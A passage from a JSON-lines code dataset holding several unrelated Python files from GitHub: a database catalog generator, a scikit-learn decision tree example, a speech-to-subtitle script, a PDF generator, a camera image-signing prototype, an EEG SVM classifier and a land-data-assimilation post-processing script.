Tuple\n\nfrom dbcat.catalog import Catalog, CatSchema, CatSource, CatTable\n\nLOGGER = logging.getLogger(__name__)\n\nCatalogObject = namedtuple(\"CatalogObject\", [\"name\", \"id\"])\n\n\nclass NoMatchesError(Exception):\n \"\"\"Raise Exception if schema/table/column generators do not find any matches\"\"\"\n\n message = \"No columns were scanned. Ensure include/exclude patterns are correct OR no new columns have been added\"\n\n\ndef filter_objects(\n include_regex_str: Optional[List[str]],\n exclude_regex_str: Optional[List[str]],\n objects: List[CatalogObject],\n) -> List[CatalogObject]:\n if include_regex_str is not None and len(include_regex_str) > 0:\n include_regex = [re.compile(exp, re.IGNORECASE) for exp in include_regex_str]\n matched_set = set()\n for regex in include_regex:\n matched_set |= set(\n list(filter(lambda m: regex.search(m.name) is not None, objects,))\n )\n\n objects = list(matched_set)\n\n if exclude_regex_str is not None and len(exclude_regex_str) > 0:\n exclude_regex = [re.compile(exp, re.IGNORECASE) for exp in exclude_regex_str]\n for regex in exclude_regex:\n objects = list(filter(lambda m: regex.search(m.name) is None, objects))\n\n return objects\n\n\ndef table_generator(\n catalog: Catalog,\n source: CatSource,\n include_schema_regex_str: List[str] = None,\n exclude_schema_regex_str: List[str] = None,\n include_table_regex_str: List[str] = None,\n exclude_table_regex_str: List[str] = None,\n) -> Generator[Tuple[CatSchema, CatTable], None, None]:\n\n schemata = filter_objects(\n include_schema_regex_str,\n exclude_schema_regex_str,\n [\n CatalogObject(s.name, s.id)\n for s in catalog.search_schema(source_like=source.name, schema_like=\"%\")\n ],\n )\n\n for schema_object in schemata:\n schema = catalog.get_schema_by_id(schema_object.id)\n LOGGER.info(\"Generating schema %s\", schema.name)\n table_objects = filter_objects(\n include_table_regex_str,\n exclude_table_regex_str,\n [\n CatalogObject(t.name, t.id)\n for t in catalog.search_tables(\n source_like=source.name, schema_like=schema.name, table_like=\"%\"\n )\n ],\n )\n\n for table_object in table_objects:\n table = catalog.get_table_by_id(table_object.id)\n LOGGER.info(\"Generating table 
%s\", table.name)\n            yield schema, table\n","repo_name":"tokern/dbcat","sub_path":"dbcat/generators.py","file_name":"generators.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"40"}
{"seq_id":"9046279866","text":"import sys\n\n# scikit-learn ≥0.20 is required\nimport sklearn\n\n# Common module imports\nimport numpy as np\nimport os\n\n# Keep notebook runs reproducible\nnp.random.seed(42)\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nmpl.rc('axes', labelsize=14)\nmpl.rc('xtick', labelsize=12)\nmpl.rc('ytick', labelsize=12)\n\n# Where to save the figures\nPROJECT_ROOT_DIR = \".\"\nCHAPTER_ID = \"decision_trees\"\nIMAGES_PATH = os.path.join(PROJECT_ROOT_DIR, \"images\", CHAPTER_ID)\nos.makedirs(IMAGES_PATH, exist_ok=True)\n\ndef save_fig(fig_id, tight_layout=True, 
fig_extension=\"png\", resolution=300):\n    path = os.path.join(IMAGES_PATH, fig_id + \".\" + fig_extension)\n    print(\"Saving figure:\", fig_id)\n    if tight_layout:\n        plt.tight_layout()\n    plt.savefig(path, format=fig_extension, dpi=resolution)\nfrom sklearn.datasets import load_iris\nfrom sklearn.tree import DecisionTreeClassifier\n\niris = load_iris()\nX = iris.data[:, 2:] # petal length and width\ny = iris.target\n\ntree_clf = DecisionTreeClassifier(max_depth=2, random_state=42)\ntree_clf.fit(X, y)\nfrom graphviz import Source\nfrom sklearn.tree import export_graphviz\n\nexport_graphviz(\n    tree_clf,\n    out_file=os.path.join(IMAGES_PATH, \"iris_tree.dot\"),\n    feature_names=iris.feature_names[2:],\n    class_names=iris.target_names,\n    rounded=True,\n    filled=True\n    )\n\nSource.from_file(os.path.join(IMAGES_PATH, \"iris_tree.dot\"))","repo_name":"a-mystic/Practice","sub_path":"Handson_ml/5.decision_trees.py","file_name":"5.decision_trees.py","file_ext":"py","file_size_in_byte":1436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"73295548601","text":"from google.cloud import speech\nfrom time import strftime\nfrom time import gmtime\nfrom google.cloud import storage\nimport wave, os, glob\nimport subprocess\n\nBUCKET_NAME = 'speech2text-artifacts'\n\n\"\"\"\n    Upload Local File to Cloud Storage Bucket\n\n    :param blob_name: Blob FileName\n    :param path_to_file: Local path to file\n    :return: File path to this resource in Cloud Storage\n\"\"\"\ndef upload_to_bucket(blob_name, path_to_file):\n    print(f\"Uploading {blob_name}\")\n    storage_client = storage.Client()\n\n    bucket = storage_client.get_bucket(BUCKET_NAME)\n    blob = bucket.blob(blob_name)\n    blob.upload_from_filename(path_to_file)\n    return f'gs://{BUCKET_NAME}/{blob_name}'\n\n\n\"\"\"\n    Speech to Text\n\n    :param gcs_uri: Audio File's Cloud Storage URL\n    :param model: Speech to Text Transcription models\n    :return: Speech to Text Response\n\"\"\"\ndef speech_to_text_conversion(gcs_uri, model):\n    print(f\"Speech to Text Conversion Started...\")\n    client = speech.SpeechClient()\n\n    audio = speech.RecognitionAudio(uri=gcs_uri)\n\n    config = speech.RecognitionConfig( \n        language_code=\"en-US\",\n        enable_automatic_punctuation=True,\n        model=model,\n        use_enhanced=True,\n        enable_word_time_offsets=True,\n    )\n\n    operation = client.long_running_recognize(\n        request={\"config\": config, \"audio\": audio}\n    )\n\n    print(\"Waiting for operation to complete...\")\n    response = operation.result(timeout=1000000)\n    return response\n\n\"\"\"\n    Generate Subtitle and Save Locally\n\n    :param speech_to_text_response: Speech to Text Response\n    :param file_basename: Video File BaseName\n    :return: void\n\"\"\"\ndef generate_subtitle(speech_to_text_response, file_basename):\n    print(f\"Subtitle Generation Started...\")\n    \n    subtitle = ''\n    sub_idx = 1\n    for result in speech_to_text_response.results:\n        best_alternative = result.alternatives[0]\n        transcript = best_alternative.transcript\n        confidence = best_alternative.confidence\n        print(\"-\" * 20)\n        print(f\"Transcript: {transcript}\")\n        print(f\"Confidence: {confidence}%\")\n\n        sentense_start_idx = 0\n        sentence_start_time = 0.00\n        sentence_start_time_ms = '000'\n        sentence_end_time = 0.00\n        sentence_end_time_ms = '000'\n        sentense = ''\n        for idx, word_info in enumerate(best_alternative.words):\n            word = word_info.word\n            start_time = word_info.start_time\n            end_time = word_info.end_time\n            is_end_of_sentense = word[-1] in ['.', '?']\n            sentense += f\"{word} \"\n\n            if sentense_start_idx == idx:\n                
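# (added clarifying note) first word of a new sentence: record its start timestamp\n                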
sentence_start_time = start_time.total_seconds()\n                sentence_start_time_ms = str(start_time.microseconds // 1000).zfill(3)\n\n            if idx == len(best_alternative.words)-1 or is_end_of_sentense:\n                sentence_end_time = end_time.total_seconds()\n                sentence_end_time_ms = str(end_time.microseconds // 1000).zfill(3)\n\n                # Append Subtitle Sentence\n                subtitle += f\"{sub_idx}\\n\"\n                subtitle += f\"{strftime('%H:%M:%S', gmtime(sentence_start_time))},{sentence_start_time_ms} --> {strftime('%H:%M:%S', gmtime(sentence_end_time))},{sentence_end_time_ms}\\n\"\n                subtitle += f\"{sentense}\\n\\n\"\n\n                sentense = ''\n                sub_idx += 1\n                sentense_start_idx = idx + 1\n\n    # Write Subtitle to SRT File\n    f = open(f\"{file_basename}-subtitle.srt\", \"w\")\n    f.write(subtitle)\n    f.close()\n\n# Main\nfor video_filename in glob.glob(os.path.join('', '*.mp4')):\n    audio_file_basename = '.'.join(video_filename.split('.')[0:-1])\n    audio_filename = f\"{audio_file_basename}.wav\"\n\n    # Converting MP4 to WAV\n    print(f\"\\nConverting {video_filename} to {audio_filename}\")\n    subprocess.Popen(f\"ffmpeg -i \\\"{video_filename}\\\" -acodec pcm_s16le -ac 1 -ar 16000 -y \\\"{audio_filename}\\\"\", stdout=subprocess.PIPE, stderr=subprocess.PIPE).communicate()\n    \n    # Upload Converted WAV File to Cloud Bucket\n    gcs_uri = upload_to_bucket(audio_filename, audio_filename)\n    \n    # Speech to Text Conversion\n    speech_to_text_response = speech_to_text_conversion(gcs_uri, \"video\")\n\n    # Generate Subtitle\n    generate_subtitle(speech_to_text_response, audio_file_basename)","repo_name":"BhanukaUOM/Video-Subtitle-Generator","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"9314448657","text":"import ClassSample as clazz\nimport platform\nimport Configuraaaation as conf\ns = clazz.Student(\"sampath\", 12)\ns.print_name()\n\n\n\nx = platform.system()\nprint(x)\ny = dir(platform)\nprint(y)\n\na = conf.person\nprint(a.get(\"name\"))","repo_name":"nawgala/python-variables","sub_path":"ModuleSample.py","file_name":"ModuleSample.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"39442066680","text":"from reportlab.pdfgen import canvas\nimport datetime\n\ndef pdf_gen():\n    datatime = ''.join(str(datetime.datetime.now()).split(' ')).replace(':','-')\n\n    c = canvas.Canvas('./%s.pdf' % datatime)\n    c.drawString(100,750, 'Selected Payment Option: ')\n    c.drawString(100,730, 'Sample data')\n\n    # canvas.line\n    # 1st argument is margin left\n    # 2nd argument is vertical position of left tip\n    # 3rd argument is margin right\n    # 4th argument is vertical position of right tip\n    c.line(1,744,747,744)\n    c.save()\n\n    return c\n\npdf_gen()","repo_name":"imLia/py_pdf_generator","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"9844432612","text":"\n# Outline for Main function\nfrom create_image import create_image\nfrom check_wifi import is_internet_available\nfrom create_metadata import create_metadata\nfrom create_combined import create_combined\nfrom upload_image import upload_image\nfrom create_digest import create_digest\nfrom create_signature import create_signature\nimport cv2\nimport base64\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\ndef 
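capture_time_location():\n\t# --- Added illustrative stub (hypothetical, not part of the original file) ---\n\t# main() below references capture_time_location() only in a commented-out\n\t# call and falls back to hardcoded placeholders; this sketch just documents\n\t# the assumed contract: return (time, location) as display strings.\n\ttime = \"2023-10-29 14:30:00\"\n\tlocation = \"Latitude: 40.7128, Longitude: -74.0060\"\n\treturn time, location\n\ndef 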
main(camera_number_string):\n#---------------------- Wait for Camera input and take picture ----------------------------\n\t\n\timage = create_image() # take the image\n\t\n\timage_blurred = cv2.blur(image,(5,5))\n\t_, encoded_image = cv2.imencode('.png', image_blurred) # we send the encoded blurred image to the cloud \n\t\n\tprint(\"Took Image; Sending Blurred\")\n\t\n#---------- Capture GNSS Data (Time and Location) ------------------------\n\n\t#time, location, = capture_time_location() # time and location both returned as strings\n\ttime = \"2023-10-29 14:30:00\"\n\tlocation = \"Latitude: 40.7128, Longitude: -74.0060\"\n\t#print(f\"Received Time and GNSS Data: {time}{location}\")\n\n#-------------- combine number + image + Time + Location ----------------------------------------------\n\n\tcombined_data = create_combined(camera_number_string, image, time, location) # returns combined data as a \n\t#print(f\"Made combined_data: {combined_data}\")\n\n# ---------------- Create digest for signing --------------------------\n\ttry:\n\t\tdigest = create_digest(combined_data)\n\t\t#print(\"Created Digest: \", digest)\n\n\texcept Exception as e:\n\t\tprint(str(e))\n\n# ---------------- Send image to TPM for Signing ------------------------\n\ttry:\n\t\tsignature_string = create_signature(digest) # byte64 encoded signature\n\t\t#print(\"Created signature_base64 string: \", signature_string)\n\t\t\n\texcept Exception as e:\n\t\tprint(str(e))\n\n#---------------- Create Metadata ------------------------------------\n\n\tmetadata = create_metadata(camera_number_string, time, location, signature_string) # creates a dictionary for the strings [string, string, string, byte64]\n\t#print(f\"Metadata: {metadata}\")\n\tprint(\"Camera Number: \", metadata['CameraNumber'])\n\n#------------------ Check if we have Wi-Fi -----------------------------\n\n\tif is_internet_available():\n\t\tprint(f\"Internet is available...Uploading\")\n\n\t\tupload_image(encoded_image.tobytes(), metadata) # cv2 png object, metadata\n\t\tprint(f\"Uploaded Image\")\n\t\n\telse: \n\n\t\tprint(\"No wifi\")\n\t\t\n \n\tplt.figure(figsize=(12,6))\n\t# Display original image\n\tplt.subplot(1, 2, 1)\n\tplt.imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))\n\tplt.title(\"Original Image\")\n\tplt.axis(\"off\")\n\n\t# Display blurred image\n\tplt.subplot(1, 2, 2)\n\tplt.imshow(cv2.cvtColor(image_blurred, cv2.COLOR_BGR2RGB))\n\tplt.title(\"Blurred Image\")\n\tplt.axis(\"off\")\n\t\t\n\tplt.show()\n\t# ---------------- Save the image and metadata to files -------------------\n\n#------------- Callback Functions for receiving Success or Failure messages for each image from cloud ------------\n\t# If success; Delete file from SD Card \n\t# If Failure; Reupload \n\n# --------------- Callback function for re-connecting to Wi-Fi ----------------------\n\t# check SD card and upload all photos\n\ncamera_number_string = \"1\" # camera number used to search for public key\nmain(camera_number_string)\n\n","repo_name":"JohnDale02/SDP-Camera","sub_path":"main_fake.py","file_name":"main_fake.py","file_ext":"py","file_size_in_byte":3253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
{"seq_id":"5662415953","text":"#!/usr/bin/env python\n\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.cross_validation import train_test_split\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.metrics import accuracy_score\nfrom 
sklearn.model_selection import cross_val_score\nfrom vector_fft_media_absoluta import load_datasets\nfrom sklearn.metrics import confusion_matrix, classification_report\nfrom sklearn import svm\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.decomposition import PCA\n\n\ndef cross_validation(x_train, y_train, x_test, y_test,kernel):\n\tcv_scores = []\n\n\ttargets = np.concatenate((y_train, y_test))\n\tdata = np.concatenate((x_train, x_test))\n\n\tfor k in range(0,100):\n\t\tsvclassifier = svm.SVC(kernel=kernel, gamma=10, class_weight=\"balanced\", degree=3, decision_function_shape='ovo')\n\t\tscores = cross_val_score(svclassifier, data, targets, cv=10, scoring='accuracy')\n\t\tcv_scores.append(scores.mean())\n\tcv_scores = np.array(cv_scores)\n\tprint(\"<<< USED KERNEL {} >>>\".format(kernel))\n\tprint(\"The average result after 100 runs and 10-fold cross validation was {}%\".format(np.around(cv_scores.mean() * 100, decimals=4)));\n\n\ndef max_data_length(data1,data2):\n\n\tif(np.size(data1,0) >= np.size(data2,0)):\n\t\treturn np.size(data2,0)\n\telse:\n\t\treturn np.size(data1,0)\n\n#Training and evaluation of the model\ndef SVM(dataset):\t\n\tdata = np.delete(dataset,5,1)\n\ttargets = dataset[:,5];\t\n\n\n\tx_train, x_test, y_train, y_test = train_test_split(data, targets, test_size=0.40, random_state=42)\n\n\tfor fig_num, kernel in enumerate(('linear', 'rbf')):\n\t\tcross_validation(x_train,y_train,x_test,y_test,kernel)\n\t\tsvclassifier = svm.SVC(kernel=kernel, gamma=10, class_weight=\"balanced\",decision_function_shape='ovo', degree=3)\n\t\n\t\tsvclassifier.fit(x_train, y_train)\n\t\t\n\t\ty_pred = svclassifier.predict(x_test)\n\t\t\n\t\tprint(confusion_matrix(y_test,y_pred))\n\t\tprint(classification_report(y_test, y_pred))\n\t\t# print(accuracy_score(y_test,y_pred))\n\t\t\n\t\n\n\n\n\n# Data standardization with StandardScaler\ndef standarize_data(data):\n\tstandar_data = StandardScaler().fit_transform(data);\n\n\treturn standar_data;\n\ndef pca_implementation(x):\n\tpca = PCA(n_components=2)\n\tprincipalComponents = pca.fit_transform(x)\n\tprincipalDf = pd.DataFrame(data = principalComponents, columns =['Principal Component 1','Principal Component 2'])\n\tprincipalNumpy = np.array(principalDf);\n\n\treturn principalNumpy\n\n\n\n\n# Load the files with the feature vector of each class\nmemory_dataset = load_datasets('vector_ftt_abs_mean_memory.csv');\nrelax_dataset = load_datasets('vector_fft_abs_mean_relax.csv');\nrelax_music_dataset = load_datasets('vector_fft_abs_mean_relax_music.csv');\n\n\n# plt.title('Unnormalized data')\n# plt.xlabel('Time')\n# plt.ylabel('AF3')\n# plt.plot(range(0,256),memory_dataset[:256,1])\n# plt.show()\n\n# print(\"<<< Feature vector >>>\")\n# print(memory_dataset[0:5,:])\n\n# Standardize the data to a more uniform scale\nmemory_dataset = standarize_data(memory_dataset); \nrelax_dataset = standarize_data(relax_dataset);\nrelax_music_dataset = standarize_data(relax_music_dataset);\n\n\n# plt.title('Normalized data')\n# plt.xlabel('Time')\n# plt.ylabel('AF3')\n# plt.plot(range(0,256),memory_dataset[:256,1])\n# plt.show();\n\n# print(\"<<< Normalized data >>>\")\n# print(memory_dataset[0:5,:])\n\n# PCA implementation\n# memory_dataset = pca_implementation(memory_dataset); \n# relax_dataset = pca_implementation(relax_dataset);\n# relax_music_dataset = pca_implementation(relax_music_dataset);\n\n# print(memory_dataset.shape)\n\nmemory_dataset = np.insert(memory_dataset,5, 1, axis=1)\nrelax_dataset = 
np.insert(relax_dataset,5, 2, axis=1)\nrelax_music_dataset = np.insert(relax_music_dataset,5, 3, axis=1)\n\n# print(memory_dataset.shape)\n\n\n\neeg_dataset = np.concatenate((memory_dataset,relax_dataset,relax_music_dataset));\n\n\n# print(eeg_dataset[0:10,:])\n\n\n# Ploting the results of corss_validation\nprint(\"+++++==MEMORIA-RELAJACION-RELAJACION_MEMORIA==++++\")\nSVM(eeg_dataset)\n\n","repo_name":"Charly1704/tesis-eeg-implementation","sub_path":"Scripts/SVM/svm_implementation.py","file_name":"svm_implementation.py","file_ext":"py","file_size_in_byte":4018,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"3042272501","text":"import sys, glob, os, re, math, time\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.mlab as mlab\nimport pandas as pd\nimport pylab as pl\nimport scipy.optimize as optim\nfrom netCDF4 import Dataset\nfrom mpl_toolkits.basemap import Basemap, addcyclic, shiftgrid\nfrom math import radians, cos, sin, asin, sqrt\nfrom scipy.stats.stats import pearsonr\nfrom mpl_toolkits.axes_grid1 import make_axes_locatable\n\npl.ioff()\npl.rc('mathtext',default='regular') # use normal font for math expressions in rendered text\nMONTH_SHORT_NAMES = ('Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec')\n# Dictionary mapping observation names to model output names\nOBS_MOD = {'FAPAR':'FAPAR', 'FAPAR_V1':'DFAPARC', 'FAPAR_V2':'FAPAR', 'FAPAR300':'FAPAR',\n 'LAI':'LAI', 'LAI_V1':'LAI', 'LAI_V2':'LAI', 'LAI300':'LAI',\n 'LST':'TS', 'LST-6':'TS', 'LST-12':'TS',\n 'SA':'TALB','raw_SWI_nc':'WG2','raw_SWI':'WG2',\n 'SA':'TALB',\n 'SWI':'WG2', 'SWI_nc':'WG2', 'SSM':'WG2', 'SSM_COMBINED_v4':'WG2', 'SSM_COMBINED_v4.5':'WG2', 'SSM_ACTIVE_v4':'WG2', 'SSM_PASSIVE_v4':'WG2',\n 'SIF':'GPP', 'SIF-L3':'GPP', 'SIF-F':'GPP', 'FLCGPP':'GPPC',\n 'SIF-L3_V27':'GPPC','SIF-L3_V27_d':'GPPC','SIF-L3_V27_p':'GPPC',\n 'E_ACTUAL':'EVAPC', 'E_t':'LETRC', 'E_b':'LEGC', 'E_i':'LERC', 'FLLE':'EVAPC', 'FLGPP':'GPPC',\n 'SM_QD':'WG2', 'SM_QD_2540':'WG2', 'SM_QD_1030':'WG2','VODC':'LAI','VODX':'LAI','VODKu':'LAI',\n 'VOD_QD_1030':'LAI', 'VOD_QD_2540':'LAI', 'VOD_L_ASC':'LAI','SIGMA_40_QD':'LAI','IMS':'PSNG','NCALDAS':'EVAPC','FLDAS':'EVAPC','NCALDAS_LAI':'EVAPC','SCFV-MODIS':'PSNG',\n 'ET_04':'EVAPC','ET_05':'EVAPC'}\n #'VOD_QD_1030':'GPPC', 'VOD_QD_2540':'GPPC', 'VOD_L_ASC':'GPPC','SIGMA_40_QD':'LAI'}\nOBS_MOD_sameUnit = {'FAPAR':True, 'FAPAR_V1':True, 'FAPAR_V2':True, 'FAPAR300':True,\n 'LAI':True, 'LAI_V1':True, 'LAI_V2':True, 'LAI300':True,\n 'LST':True, 'LST-6':True, 'LST-12':True,\n 'SA':True,'VODC': False,'VODX': False,'VODKu': False,\n 'VOD_QD_1030': False, 'VOD_QD_2540':False, 'VOD_L_ASC':False,\n 'SWI':True, 'SWI_nc':True,'SSM':True, 'SSM_COMBINED_v4':True, 'SSM_COMBINED_v4.5':True, 'SSM_ACTIVE_v4':True, 'SSM_PASSIVE_v4':True,\n 'SM_QD':True,'SM_QD_2540':True,'SM_QD_1030':True,'SIGMA_40_QD':False,\n 'SIF':False, 'SIF-L3':False, 'SIF-F':False, 'FLCGPP':True,\n 'SIF-L3_V27':False,'SIF-L3_V27_d':False,'SIF-L3_V27_p':False,\n 'E_ACTUAL':True, 'E_t':True, 'E_b':True, 'E_i':True, 'FLLE':True, 'FLGPP':True,\n 'ET_04':True, 'ET_05':True}\n\n\nnumbers = re.compile(r'(\\d+)')\ndef numericalSort(value):\n parts = numbers.split(value)\n\n return parts\n\ndef check_post_zones(post_zones):\n '''\n Function used to check and format the post_zones dict.\n '''\n tmp_zones = dict()\n for zname,zone in post_zones.items():\n if zname=='def':\n tmp_zones['model zone'] = None\n elif zname=='point':\n for i,xy in 
zip(range(len(zone)),zone):\n pnt = 'pnt_{:02d}'.format(i+1)\n tmp_zones[pnt] = [[xy[0],xy[1]],[xy[0],xy[1]]]\n elif isinstance(zone,str): # If a netcdf file is given\n if not os.path.isfile(zone):\n raise Exception('\\nNetcdf file given for mask does not exist: {0}'.format(zone))\n with Dataset(zone) as nc:\n if zname=='all':\n for name in nc.variables['Name']: tmp_zones[name] = zone\n elif zname not in nc.variables['Name']:\n raise Exception('Mask name {0} not in {1}'.format(zname,zone))\n else: tmp_zones[zname] = zone\n else:\n tmp_zones[zname] = zone\n return tmp_zones\n\ndef prepareZone(zname,zone,map_set,graphics_dir):\n '''\n Prepares variables for the selected zone\n '''\n if zname=='model zone': # By default, zone = model grid\n map_set.zone = None\n graphics_dir_zone = graphics_dir\n IPNT = None\n else:\n graphics_dir_zone = graphics_dir+zname+'/'\n if isinstance(zone,str): # If a netcdf file is given\n nc = Dataset(zone)\n zone_id = nc.variables['Id'][pl.argwhere(nc.variables['Name'][:]==zname)[0][0]]\n IPNT = pl.where(nc.variables['Mask'][::-1,:]==zone_id,True,False).ravel()\n map_set.zone = [[min(map_set.X.ravel()[IPNT]),max(map_set.Y.ravel()[IPNT])],\n [max(map_set.X.ravel()[IPNT]),min(map_set.Y.ravel()[IPNT])]]\n nc.close()\n else: # If zone is a rectangular area [[lon_min,lat_max],[lon_max,lat_min]]\n map_set.zone = zone\n IPNT = pl.logical_and(map_set.mod_lon.ravel()>=zone[0][0],map_set.mod_lon.ravel()<=zone[1][0])\n IPNT = pl.logical_and(IPNT,\\\n pl.logical_and(map_set.mod_lat.ravel()<=zone[0][1],map_set.mod_lat.ravel()>=zone[1][1]))\n if map_set.mod_grid_type!='uniform': IPNT = IPNT[map_set.remap]\n # Directories for the selected zone\n graphics_dir_zone = graphics_dir_zone.replace(' ','_')\n makeDirIfNeeded(graphics_dir_zone)\n return map_set,graphics_dir_zone,IPNT\n\nfrom ldasModule import *\nfrom ldasMapSet import mapSet, uniformTicks, Basemap, Figure\n\n\ndef postObs(obs, data=None, minim=None, maxim=None):\n importLocals(currentframe())\n print('===================================================')\n print('Post-processing for observation: {0}'.format(obs)+(', model variable: {1}'.format(obs, OBS_MOD[obs]) if obs in OBS_MOD.keys() else ''))\n # Read all data\n if data is None:\n data = readAllData(obs, analysis_period, assim_hour, patch_frac, out_all_dir, \\\n post_from_pickle, mod_ana_dir, ['Model','Analysis','Obs'], \\\n IPNT=IPNT, map_set=map_set, filter_nan=not('SIF' in obs or 'E_ACTUAL' in obs or 'FLGPP' in obs))\n if 0 in data.shape:\n print('No dataset or no time step or no point. 
Continuing with next obs...')\n return\n items = data.coords['name'].values\n col_labels = [modexp_names[n] if n in modexp_names.keys() else n for n in items]\n if 'Analysis' in data.coords['name'].values and 'Model' in data.coords['name'].values:\n col_labels.append(col_labels[pl.find(items=='Analysis')[0]]+'-'+col_labels[pl.find(items=='Model')[0]])\n for time_window,t in zip(list_time_windows,range(len(list_time_windows))):\n if any([var_spatial_maps_out[t],var_time_series_out[t]]):\n print('Time window applied for {0}: {1}'.format(obs, time_window))\n # Apply time window\n data_tw = applyTimeWindow(data, time_window)\n # Additional diagnostis: analysis-model\n items_tw = data_tw.coords['name'].values\n if 'Analysis' in items_tw and 'Model' in items_tw:\n diff = data_tw.sel(name='Analysis')-data_tw.sel(name='Model')\n diff.values[diff.values==0] = np.nan\n diff = diff.assign_coords(name='Analysis-Model')\n diff = diff.expand_dims('name')\n data_tw = xr.concat([data_tw, diff], dim='name')\n #\n # Draw maps of variables: model, obs, analysis, diff(analysis-model)\n if minim is None and obs in CBAR_MINMAX: minim = CBAR_MINMAX[obs][0]\n if maxim is None and obs in CBAR_MINMAX: maxim = CBAR_MINMAX[obs][1]\n if var_spatial_maps_out[t]: draw_map_vars(map_set,obs,data_tw,graphics_dir=graphics_dir_zone,time_window=time_window,fig_dpi=fig_dpi,minim=minim,maxim=maxim,col_labels=col_labels)\n # Draw time series of variables (spatial average over the whole domain)\n if var_time_series_out[t]: draw_series_vars(data_tw.mean('point'), obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi, col_labels=col_labels)\n #\n # Compute statistics ('R','bias','std','rmse') and show\n if 'Obs' in items and any([stats_spatial_maps_out[t],stats_time_series_out[t],stats_table_out[t]]):\n # Draw maps of statistic scores: model vs obs, analysis vs obs, diff(analysis-model)\n if stats_spatial_maps_out[t]:\n if 'SIF' in obs or 'E_ACTUAL' in obs or 'FLGPP' in obs:\n scores_per_point = compute_scores_per_point(applyTimeWindow(data,'month'), time_window)\n else:\n scores_per_point = compute_scores_per_point(data, time_window)\n draw_map_stats(map_set, scores_per_point, graphics_dir=graphics_dir_zone, obs_var=obs, time_window=time_window, fig_dpi=fig_dpi, col_labels=col_labels)\n # Draw timeseries of statistic scores (spatial average over the whole domain)\n if 'SIF' in obs: scores_for_all_points = compute_scores_for_all_points(applyTimeWindow(data,'month'), time_window)\n ### Here, I compute both scores_per_point, and scores for all points at the same time - Take out if not needed, as this slows the process\n else : scores_for_all_points = compute_scores_for_all_points(data, time_window); scores_per_point = compute_scores_per_point(data, time_window)\n if stats_time_series_out[t]: draw_series_stats(scores_for_all_points, obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi, col_labels=col_labels)\n if stats_table_out[t]: drawScoresTable(scores_for_all_points, obs=obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi)\n #if stats_table_out[t]: drawScoresTable(scores_per_point.mean(axis=3), obs=obs, graphics_dir=graphics_dir_zone, time_window=time_window, fig_dpi=fig_dpi)\n #pdb.set_trace()\n\n #scores_for_all_points.to_netcdf('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/CustomPostProcessing/Data/US00/ldasPostScores/V3/{0}_{1}_{2}_scores_for_all_points.nc'.format(zname,obs,fname))\n 
#scores_per_point.to_netcdf('/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/CustomPostProcessing/Data/US00/ldasPostScores/V3/{0}_{1}_{2}_scores_per_point.nc'.format(zname,obs,fname))\n\n #return scores_for_all_points\n #return scores_per_point\n\n\n\noptions_file = '/cnrm/vegeo/muciaa/ldas_chain_python/ldas_curr/options_US00.py'\n\n#initPost(options_file)\nif options_file is not None:\n local_vars = dict()\n #try: execfile(options_file,local_vars)\n try: exec(open(options_file).read(),local_vars)\n except: raise Exception('\\nError in the options file!')\nelse:\n local_vars = currentframe(1).f_globals\n# Update local variables and check options\n#for key,value in local_vars.iteritems(): exec(key+\"=value\")\nfor key,value in local_vars.items(): exec(key+\"=value\")\ncheckOptions(locals(),options_file)\n#\nprint('\\nInitializing LDAS post-processing ({0} - {1}).\\n'.format(analysis_period[0],analysis_period[1]))\n#\n# Make initializations\n# If LST is in the obs list, then LST is analyzed at 6am and 12pm\nif 'LST' in obs_names:\n id_LST = obs_names.index('LST')\n del to_assim[id_LST]\n del rescale_calibs[id_LST]\n del rescale_calib_periods[id_LST]\n obs_names = filter(lambda x: x != 'LST',obs_names) + ['LST-6', 'LST-12']\n to_assim = to_assim + [False, False]\n rescale_calibs = rescale_calibs + [None,None]\n rescale_calib_periods = rescale_calib_periods+[[],[]]\n#\n# Main parameters definition\nout_all_dir = {'Obs': out_obs_dir, 'Model': out_mod_dir, 'Analysis': out_ana_dir}\npost_from_pickle = {'Obs': post_obs_from_pickle, 'rawObs': post_obs_from_pickle, \\\n 'Model': post_mod_from_pickle, 'Analysis': post_ana_from_pickle}\nobs_assim = [obs_names[i] for i in range(len(obs_names)) if to_assim[i]==True ]\nobs_NOassim = [obs_names[i] for i in range(len(obs_names)) if to_assim[i]==False]\nobs_assim_rescaled = [obs_names[i] for i in range(len(obs_names)) if to_assim[i] and rescale_calibs[i]]\npatch_frac = getModelPatchFractions(mod_pgd_path)\nmod_grid,trip_grid = parseOptionsNam(options_path)\nmod_ana_dir = {'Model': openloop_dir, 'Analysis': analysis_dir}\nif modexp_names=='def': modexp_names = {'Model':'Model', 'Analysis':'Analysis'}\nelse: modexp_names = {'Model':modexp_names[0], 'Analysis':modexp_names[1]}\npatch_post = pl.array(patch_out)-1\n#\n# Create instance of mapSet\nmap_set = 